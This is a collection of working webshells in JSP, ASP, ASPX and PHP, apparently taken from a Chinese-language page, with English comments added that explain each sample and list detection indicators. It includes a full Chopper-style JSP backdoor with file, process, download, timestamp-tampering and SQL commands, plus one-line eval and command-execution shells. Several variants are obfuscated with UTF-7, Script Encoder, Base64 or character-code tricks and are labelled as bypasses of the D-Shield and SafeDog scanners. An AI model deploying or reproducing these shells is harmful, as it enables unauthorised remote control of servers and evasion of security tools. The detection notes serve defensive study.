JSP:
无回显(http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls)
<%-- Unauthenticated, no-output command execution (the "无回显" case): the raw `i` request parameter is handed straight to Runtime.exec(), and neither stdout nor the exit status is written back to the response. Any JSP that feeds request.getParameter() into Runtime.exec() is a webshell indicator for code review and file-integrity alerting. --%>
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
有回显 (http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls)
<%-- Command execution with output (the "有回显" case), gated only by the hard-coded pwd=023 comparison. The process's stdout is copied into a <pre> block; stderr is never read and the process stream is never closed. `new String(b,0,a)` uses the platform default charset, so multi-byte output that straddles a 2048-byte read boundary is garbled. Bare digits 1-9 inside the line are gutter numbers from the original listing, not code. --%>
1 <% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(" 2 <pre>"); 3 while((a=in.read(b))!=-1){ 4 out.println(new String(b,0,a)); 5 } 6 out.print("</pre> 7 "); 8 } 9 %>
客户端写入:
http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
<%-- Arbitrary file write: the bytes of parameter `c` are written to whatever path parameter `f` names (an absolute filesystem path in the example URL above), with no restriction on location and without closing the stream. A JSP that opens new FileOutputStream(request.getParameter(...)) should be flagged outright. The leading "1" is a gutter number from the original listing. --%>
1 <%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
<%-- Same arbitrary write, but the target is application.getRealPath("/") + "/" + f, i.e. relative to the deployed web application directory; `f` is not normalized, so the location is still attacker-controlled. The stream is never closed. The leading "1" is a gutter number from the original listing. --%>
1 <%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>
http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
<%-- RandomAccessFile variant of the absolute-path write: opened "rw", the bytes of `c` are written at offset 0 without truncating, so a pre-existing longer file keeps its trailing bytes. Never closed. The leading "1" is a gutter number from the original listing. --%>
1 <%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
<%-- RandomAccessFile variant rooted at the web application directory (application.getRealPath("/") + "/" + f). As above, "rw" writes at offset 0 without truncating and the handle is never closed. The leading "1" is a gutter number from the original listing. --%>
1 <%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
反射调用外部jar:
http://192.168.16.240:8080/Shell/reflect.jsp?u=http://javaweb.org/Cat.jar&023=A
<%-- Remote class loading: a URLClassLoader is built from the attacker-supplied `u` parameter, class "Load" is resolved through it, and its first public method (getMethods()[0]) is invoked with the request parameter map; the return value is written into the page. Detection points: the servlet container process fetching a .jar over HTTP, and URLClassLoader / Class.forName fed from request parameters. The leading "1" is a gutter number from the original listing. --%>
1 <%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{request.getParameterMap()})%>
常规:
<%-- Webroot file write used by the HTML "client" form further down: when parameter `f` is present, the body of parameter `t` is written to application.getRealPath(...) + f. As transcribed, getRealPath("\") is not valid Java (the backslash escapes the closing quote); the same snippet inside the client page below uses getRealPath(""), which is presumably what was intended. Bare digits 1-3 are gutter numbers from the original listing. --%>
1 <% 2 if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); 3 %>
<%-- Full-featured JSP webshell server (the "常规" listing): a page directive, a declaration block of helper methods, then a scriptlet dispatcher. Bare digits 1-297 throughout are gutter numbers from the original listing, not code.
  Protocol (scriptlet, items 221-296): `z0` selects the request/response charset (default gbk); the parameter named by Pwd ("pass") carries a one-letter command; `z1`/`z2` are its arguments. Every response is wrapped between "->|" and "|<-" (built as split constants "->" + "|", apparently to avoid a literal signature in the file) and errors come back as "ERROR:// " followed by the exception text. Those three strings, and the parameter names pass/z0/z1/z2, are usable response/request indicators; the ->| ... |<- framing is the format Chopper-style clients expect. EC() is a no-op (the charset conversion is commented out), so inputs are used verbatim.
  Commands: A current directory plus drive roots (AA); B directory listing with mtime, size and R/W flags (BB); C read a file; D write z2 to file z1; E recursive delete (EE); F stream a file into the raw response (FF, same ->| / |<- framing); G write a file from a hex string (GG); H recursive copy (HH); I rename (II); J mkdir (JJ); K set a file's last-modified time from a "yyyy-MM-dd HH:mm:ss" string (KK - timestamp tampering, so mtime cannot be trusted on a host where this ran); L download a URL to a local file (LL); M run a process with argv { z1 from index 2, first two chars of z1, z2 } - i.e. an interpreter and its flag packed into z1 and the command line in z2 - returning stdout then stderr (MM); N/O/P enumerate JDBC catalogs, tables and columns; Q run arbitrary SQL as a query, falling back to executeUpdate if the query fails.
  GC() builds the JDBC connection from a space-separated "driverClass url [catalog]" string and calls Class.forName(...).newInstance() on the attacker-supplied driver name, so it doubles as an arbitrary-class-instantiation primitive. The 1005 / 1007 / 1008 literals are ResultSet.TYPE_SCROLL_SENSITIVE / CONCUR_READ_ONLY / CONCUR_UPDATABLE. --%>
1 <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> 2 <%!String Pwd = "pass"; 3 4 String EC(String s, String c) throws Exception { 5 return s; 6 }//new String(s.getBytes("ISO-8859-1"),c);} 7 8 Connection GC(String s) throws Exception { 9 String[] x = s.trim().split(" "); 10 Class.forName(x[0].trim()).newInstance(); 11 Connection c = DriverManager.getConnection(x[1].trim()); 12 if (x.length > 2) { 13 c.setCatalog(x[2].trim()); 14 } 15 return c; 16 } 17 18 void AA(StringBuffer sb) throws Exception { 19 File r[] = File.listRoots(); 20 for (int i = 0; i < r.length; i++) { 21 sb.append(r[i].toString().substring(0, 2)); 22 } 23 } 24 25 void BB(String s, StringBuffer sb) throws Exception { 26 File oF = new File(s), l[] = oF.listFiles(); 27 String sT, sQ, sF = ""; 28 java.util.Date dt; 29 SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 30 for (int i = 0; i < l.length; i++) { 31 dt = new java.util.Date(l[i].lastModified()); 32 sT = fm.format(dt); 33 sQ = l[i].canRead() ? "R" : ""; 34 sQ += l[i].canWrite() ? 
" W" : ""; 35 if (l[i].isDirectory()) { 36 sb.append(l[i].getName() + "/ " + sT + " " + l[i].length() 37 + " " + sQ + " "); 38 } else { 39 sF += l[i].getName() + " " + sT + " " + l[i].length() + " " 40 + sQ + " "; 41 } 42 } 43 sb.append(sF); 44 } 45 46 void EE(String s) throws Exception { 47 File f = new File(s); 48 if (f.isDirectory()) { 49 File x[] = f.listFiles(); 50 for (int k = 0; k < x.length; k++) { 51 if (!x[k].delete()) { 52 EE(x[k].getPath()); 53 } 54 } 55 } 56 f.delete(); 57 } 58 59 void FF(String s, HttpServletResponse r) throws Exception { 60 int n; 61 byte[] b = new byte[512]; 62 r.reset(); 63 ServletOutputStream os = r.getOutputStream(); 64 BufferedInputStream is = new BufferedInputStream(new FileInputStream(s)); 65 os.write(("->" + "|").getBytes(), 0, 3); 66 while ((n = is.read(b, 0, 512)) != -1) { 67 os.write(b, 0, n); 68 } 69 os.write(("|" + "<-").getBytes(), 0, 3); 70 os.close(); 71 is.close(); 72 } 73 74 void GG(String s, String d) throws Exception { 75 String h = "0123456789ABCDEF"; 76 int n; 77 File f = new File(s); 78 f.createNewFile(); 79 FileOutputStream os = new FileOutputStream(f); 80 for (int i = 0; i < d.length(); i += 2) { 81 os 82 .write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d 83 .charAt(i + 1)))); 84 } 85 os.close(); 86 } 87 88 void HH(String s, String d) throws Exception { 89 File sf = new File(s), df = new File(d); 90 if (sf.isDirectory()) { 91 if (!df.exists()) { 92 df.mkdir(); 93 } 94 File z[] = sf.listFiles(); 95 for (int j = 0; j < z.length; j++) { 96 HH(s + "/" + z[j].getName(), d + "/" + z[j].getName()); 97 } 98 } else { 99 FileInputStream is = new FileInputStream(sf); 100 FileOutputStream os = new FileOutputStream(df); 101 int n; 102 byte[] b = new byte[512]; 103 while ((n = is.read(b, 0, 512)) != -1) { 104 os.write(b, 0, n); 105 } 106 is.close(); 107 os.close(); 108 } 109 } 110 111 void II(String s, String d) throws Exception { 112 File sf = new File(s), df = new File(d); 113 sf.renameTo(df); 114 } 115 116 void JJ(String 
s) throws Exception { 117 File f = new File(s); 118 f.mkdir(); 119 } 120 121 void KK(String s, String t) throws Exception { 122 File f = new File(s); 123 SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 124 java.util.Date dt = fm.parse(t); 125 f.setLastModified(dt.getTime()); 126 } 127 128 void LL(String s, String d) throws Exception { 129 URL u = new URL(s); 130 int n; 131 FileOutputStream os = new FileOutputStream(d); 132 HttpURLConnection h = (HttpURLConnection) u.openConnection(); 133 InputStream is = h.getInputStream(); 134 byte[] b = new byte[512]; 135 while ((n = is.read(b, 0, 512)) != -1) { 136 os.write(b, 0, n); 137 } 138 os.close(); 139 is.close(); 140 h.disconnect(); 141 } 142 143 void MM(InputStream is, StringBuffer sb) throws Exception { 144 String l; 145 BufferedReader br = new BufferedReader(new InputStreamReader(is)); 146 while ((l = br.readLine()) != null) { 147 sb.append(l + " "); 148 } 149 } 150 151 void NN(String s, StringBuffer sb) throws Exception { 152 Connection c = GC(s); 153 ResultSet r = c.getMetaData().getCatalogs(); 154 while (r.next()) { 155 sb.append(r.getString(1) + " "); 156 } 157 r.close(); 158 c.close(); 159 } 160 161 void OO(String s, StringBuffer sb) throws Exception { 162 Connection c = GC(s); 163 String[] t = { "TABLE" }; 164 ResultSet r = c.getMetaData().getTables(null, null, "%", t); 165 while (r.next()) { 166 sb.append(r.getString("TABLE_NAME") + " "); 167 } 168 r.close(); 169 c.close(); 170 } 171 172 void PP(String s, StringBuffer sb) throws Exception { 173 String[] x = s.trim().split(" "); 174 Connection c = GC(s); 175 Statement m = c.createStatement(1005, 1007); 176 ResultSet r = m.executeQuery("select * from " + x[3]); 177 ResultSetMetaData d = r.getMetaData(); 178 for (int i = 1; i <= d.getColumnCount(); i++) { 179 sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i) 180 + ") "); 181 } 182 r.close(); 183 m.close(); 184 c.close(); 185 } 186 187 void QQ(String cs, String s, String q, 
StringBuffer sb) throws Exception { 188 int i; 189 Connection c = GC(s); 190 Statement m = c.createStatement(1005, 1008); 191 try { 192 ResultSet r = m.executeQuery(q); 193 ResultSetMetaData d = r.getMetaData(); 194 int n = d.getColumnCount(); 195 for (i = 1; i <= n; i++) { 196 sb.append(d.getColumnName(i) + " | "); 197 } 198 sb.append(" "); 199 while (r.next()) { 200 for (i = 1; i <= n; i++) { 201 sb.append(EC(r.getString(i), cs) + " | "); 202 } 203 sb.append(" "); 204 } 205 r.close(); 206 } catch (Exception e) { 207 sb.append("Result | "); 208 try { 209 m.executeUpdate(q); 210 sb.append("Execute Successfully! | "); 211 } catch (Exception ee) { 212 sb.append(ee.toString() + " | "); 213 } 214 } 215 m.close(); 216 c.close(); 217 }%> 218 219 220 <% 221 String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z0") + ""; 222 request.setCharacterEncoding(cs); 223 response.setContentType("text/html;charset=" + cs); 224 String Z = EC(request.getParameter(Pwd) + "", cs); 225 String z1 = EC(request.getParameter("z1") + "", cs); 226 String z2 = EC(request.getParameter("z2") + "", cs); 227 StringBuffer sb = new StringBuffer(""); 228 try { 229 sb.append("->" + "|"); 230 if (Z.equals("A")) { 231 String s = new File(application.getRealPath(request 232 .getRequestURI())).getParent(); 233 sb.append(s + " "); 234 if (!s.substring(0, 1).equals("/")) { 235 AA(sb); 236 } 237 } else if (Z.equals("B")) { 238 BB(z1, sb); 239 } else if (Z.equals("C")) { 240 String l = ""; 241 BufferedReader br = new BufferedReader( 242 new InputStreamReader(new FileInputStream(new File( 243 z1)))); 244 while ((l = br.readLine()) != null) { 245 sb.append(l + " "); 246 } 247 br.close(); 248 } else if (Z.equals("D")) { 249 BufferedWriter bw = new BufferedWriter( 250 new OutputStreamWriter(new FileOutputStream( 251 new File(z1)))); 252 bw.write(z2); 253 bw.close(); 254 sb.append("1"); 255 } else if (Z.equals("E")) { 256 EE(z1); 257 sb.append("1"); 258 } else if (Z.equals("F")) { 259 FF(z1, 
response); 260 } else if (Z.equals("G")) { 261 GG(z1, z2); 262 sb.append("1"); 263 } else if (Z.equals("H")) { 264 HH(z1, z2); 265 sb.append("1"); 266 } else if (Z.equals("I")) { 267 II(z1, z2); 268 sb.append("1"); 269 } else if (Z.equals("J")) { 270 JJ(z1); 271 sb.append("1"); 272 } else if (Z.equals("K")) { 273 KK(z1, z2); 274 sb.append("1"); 275 } else if (Z.equals("L")) { 276 LL(z1, z2); 277 sb.append("1"); 278 } else if (Z.equals("M")) { 279 String[] c = { z1.substring(2), z1.substring(0, 2), z2 }; 280 Process p = Runtime.getRuntime().exec(c); 281 MM(p.getInputStream(), sb); 282 MM(p.getErrorStream(), sb); 283 } else if (Z.equals("N")) { 284 NN(z1, sb); 285 } else if (Z.equals("O")) { 286 OO(z1, sb); 287 } else if (Z.equals("P")) { 288 PP(z1, sb); 289 } else if (Z.equals("Q")) { 290 QQ(cs, z1, z2, sb); 291 } 292 } catch (Exception e) { 293 sb.append("ERROR" + ":// " + e.toString()); 294 } 295 sb.append("|" + "<-"); 296 out.print(sb.toString()); 297 %>
JSP后门连接:
<!-- Upload client ("JSP一句话木马客户端"): a form whose action is set at click time to the URL typed into the `url` field, POSTing the code from textarea `t` and the target filename `f` (default shell.jsp) to that server. The read-only textarea at the bottom shows the matching server-side one-liner, which writes `t` to application.getRealPath("")+f, i.e. inside the web application directory. Detection: a POST carrying a `t` body of JSP source plus an `f` filename to a .jsp endpoint. The leading "1" is a gutter number from the original listing. -->
1 <html><head><title>JSP一句话木马客户端</title></head><div align=center> <font color=red>专用JSP木马连接器</font><br><form name=get method=post>服务端地址<input name=url size=110 type=text> <br><br><textarea name=t rows=20 cols=120>你提交的代码</textarea><br>保存成的文件名:<input name=f size=30 value=shell.jsp><input type=button onclick="javascript:get.action=document.get.url.value;get.submit()" value=提交> </form> <br>服务端代码:<br><textarea rows=5 cols=120><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> </textarea> </div></body>
下载远程文件:
http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
<%-- Download-and-write: the server fetches the URL in parameter `u` (a server-side request forgery primitive - the container makes the outbound connection) and writes the entire body to the path in parameter `f`, an absolute filesystem path in the example URL above. Neither the input nor the output stream is closed. Detection: outbound HTTP from the servlet container followed by a new file under a web or system directory. The leading "1" is a gutter number from the original listing. --%>
1 <% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = new byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; while ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>
下载web路径:
http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png
<%-- Same download-and-write, with the destination rooted at application.getRealPath("/") + "/" + f, i.e. relative to the deployed web application (the "下载web路径" case). Streams are never closed. The leading "1" is a gutter number from the original listing. --%>
1 <% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = new byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; while ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>
ASP:
<%' Classic ASP one-liner: the value of request parameter "chopper" is evaluated as VBScript. Detection: Eval / Execute / ExecuteGlobal applied to Request(...) in .asp files, and requests whose body is VBScript text under a single parameter name. %>
<%eval request("chopper")%>
常规:
<%' Variants of the same primitive - every one of these evaluates a request parameter as VBScript. Items 1-9: execute / ExecuteGlobal / Eval, directly or through a temporary variable. Item 11 caches the payload in Session("c") so later requests need not resend it. Items 15-17 wrap the call in an unbalanced comment. Items 19-21 use script runat=server tags instead of scriptlets. Items 23-27 rebuild request(...) or the whole call from chr() values, concatenated fragments or unescape(), so only the outer Eval/Execute keyword is present literally; scanners should therefore key on Eval/Execute with any non-literal argument rather than on the word "request". Parameter names used here: chopper, c, #, a. Bare digits 1-27 are gutter numbers from the original listing. %>
1 <%execute request("chopper")%> 2 3 <%execute(request("chopper"))%> 4 5 <%ExecuteGlobal request("chopper")%> 6 7 <%Eval(Request(chr(35)))%> 8 9 <%dy=request("c")%><%Eval(dy)%> 10 11 <%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%> 12 13 <% if Request("c")<>"" then ExecuteGlobal request("c") end if %> 14 15 <%execute request("c")%><%'<% loop <%:%> 16 17 < %'<% loop <%:%><%execute request("a")%> 18 19 <script language=vbs runat=server>eval(request("c"))</script> 20 21 <script language=VBScript runat=server>execute request("#")</script> 22 23 <%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("c"))%> 24 25 <%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%> 26 27 <%execute(unescape("eval%20request%28%22aaa%22%29"))%>
UTF-7编码加密:
1 <%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>
<%' UTF-7 encoding (codepage 65000): once the plus-j-minus filler sequences are dropped and the sequence that encodes a double quote is decoded, the third scriptlet reads execute(request("#")) - the same "#" parameter as elsewhere on this page. The curly quotes around 936 look like typographic quotes introduced by the web page, not part of the original. Detection: an @codepage=65000 directive together with script text that is unreadable without UTF-7 decoding is itself a strong indicator. The leading "1" is a gutter number from the original listing. %>
Script Encoder 加密 //密码c
1 <%@ LANGUAGE = VBScript.Encode %> 2 <%#@~^PgAAAA==~b0~"+$E+kYvEmr#@!@*rJ~O4+x,36mEDn!VK4mV~Dn5!+dYvEmr#~n NPrW,SBMAAA==^#~@%>
<!-- Microsoft Script Encoder output: LANGUAGE = VBScript.Encode with the #@~^ ... ^#~@ envelope around the script body. The heading above states the parameter name is c; the encoded text is not decoded here. Script Encoder is an obfuscation, not encryption, so encoded .asp files should be decoded during triage; the LANGUAGE = VBScript.Encode directive itself is a strong indicator. Bare digits 1-2 are gutter numbers from the original listing. -->
过雷客图:
<%' Three ASP variants. Item 1 instantiates MSScriptControl.ScriptControl.1, hands it the Response/request/session/server/application objects and runs "execute(request(chr(35)))" through ExecuteStatement - chr(35) is "#" - so the evaluation happens inside the script control rather than in an Execute statement of this page. Items 11-13 and 17-19 both end up running Execute(password) with password = Request("class"): AACode decodes the hex string 4578...6429 to that text, and DeAsc decodes the %-separated list by subtracting 18 from each value. Detection: ScriptControl.ExecuteStatement, Execute applied to the result of a local decoder function, and a variable assigned from Request(...) that is later passed to Execute. Bare digits 1-19 are gutter numbers from the original listing. %>
1 <%set ms = server.CreateObject("MSScriptControl.ScriptControl.1") 2 ms.Language="VBScript" 3 ms.AddObject "Response", Response 4 ms.AddObject "request", request 5 ms.AddObject "session", session 6 ms.AddObject "server", server 7 ms.AddObject "application", application 8 ms.ExecuteStatement ("ex"&"e"&"cute(request(chr(35)))")%> 9 10 <% 11 password=Request("class") 12 Execute(AACode("457865637574652870617373776F726429")):Function AACode(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute("AACode=AACode&chr(&H"&c&")"):Else:Execute("AACode=AACode&chr(&H"&c&Mid(s,i+2,2)&")"):i=i+2:End If:Next:End Function 13 %> 14 15 16 <% 17 password=Request("class") 18 Execute(DeAsc("%87%138%119%117%135%134%119%58%130%115%133%133%137%129%132%118%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function 19 %>
ASPX:
常规免杀
1 <%@ Page Language="Jscript"%> 2 <% 3 var a = Request.Item["M"]; 4 var b = "un" + Char ( 115 ) + Char ( 97 ) + "fe";// this is the key spot; the rest apparently is not inspected 5 eval(a,b); 6 Response.Write("Test"); 7 %>
<%-- ASP.NET page in JScript: Request.Item["M"] is passed to eval() with the second argument "unsafe" (assembled as "un" + Char(115) + Char(97) + "fe"), which enables JScript.NET's unrestricted evaluation mode. Response.Write("Test") only makes the page look benign. Detection: JScript eval with a second argument, especially one built from Char() calls or concatenation, and Request.Item / Request.Form values flowing into eval. Bare digits 1-7 are gutter numbers from the original listing. --%>
绕过安全狗
<%' Two-stage ASP: the first scriptlet stores Request("#") in `play` behind a run of empty comment lines, a literal "Error" is emitted as page text, and a second scriptlet calls execute(play). Detection needs whole-file data flow: a variable assigned from Request(...) in one block and passed to Execute in another, plus blocks of empty comment lines. Bare digits 1-12 are gutter numbers from the original listing. %>
1 <% 2 dim play 3 ' 4 ' 5 '''''''''''''''''' 6 ''''''''' 7 play = request("#") 8 %> 9 Error 10 <% 11 execute(play) 12 %>
1 <%@codepage=65000%> 2 <%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("#")%>
<%' UTF-7 (codepage 65000) once more: with the plus-k-minus filler sequences removed the scriptlet reads response.codepage=936:eval request("#"). Same indicator as the earlier UTF-7 sample - an @codepage=65000 directive together with script text that needs UTF-7 decoding to read. Bare digits 1-2 are gutter numbers from the original listing. %>
过D盾:
1 <%@ Page Language="Jscript" Debug=true%> 2 <% 3 var a=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5Gb3JtWyJwYXNzIl0=")); 4 var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("dW5zYWZl")); 5 var c=eval(a,b); 6 eval(c,b); 7 8 %> 9 10 11 12 <%@ Page Language="Jscript" Debug=true%> 13 <% 14 var a=Request.Form["pass"]; 15 var b="unsa",c="fe",d=b+c; 16 function fun() 17 { 18 return a; 19 } 20 eval(fun(),d); 21 %>
<%-- Two ASP.NET/JScript variants. Items 1-8: the two Base64 strings decode to Request.Form["pass"] and "unsafe"; the first eval() evaluates that expression text to fetch the POSTed payload and the second eval() runs it. Items 12-21: the same with Request.Form["pass"] written out, "unsafe" split into "unsa" + "fe", and the payload returned through a trivial function. Detection: eval() with a second argument, Convert.FromBase64String output flowing into eval, and Debug=true on a page with no user interface. Bare digits 1-21 are gutter numbers from the original listing. --%>
PHP:
常规:
<?php /* Unauthenticated PHP command execution: system() runs the `cmd` query-string parameter and echoes its output. Bare digits 1-3 are gutter numbers from the original listing. */ ?>
1 <?php 2 system($_GET['cmd']); 3 ?>
过D盾:
<?php /* PHP eval shell: $_REQUEST['d'] (GET, POST or cookie) is concatenated with an empty array element and passed to eval(). The indirection changes nothing at runtime, so static scanning should resolve the operand of eval() through simple assignments and concatenations rather than require a literal $_REQUEST inside the call. Bare digits 1-4 are gutter numbers from the original listing. */ ?>
1 <?php 2 $ab = $_REQUEST['d']; 3 $a['t'] = ""; 4 eval($a['t'].$ab);
过安全狗
<?php /* Same eval shell with string interpolation: $_REQUEST['d'] is copied through "$a" and concatenated with an empty array element before eval(). Functionally identical to the previous sample; the same data-flow-based detection applies. Bare digits 1-5 are gutter numbers from the original listing. */ ?>
1 <?php 2 $a = $_REQUEST['d']; 3 $a = "$a"; 4 $b['test'] = ""; 5 eval($b['test']."$a");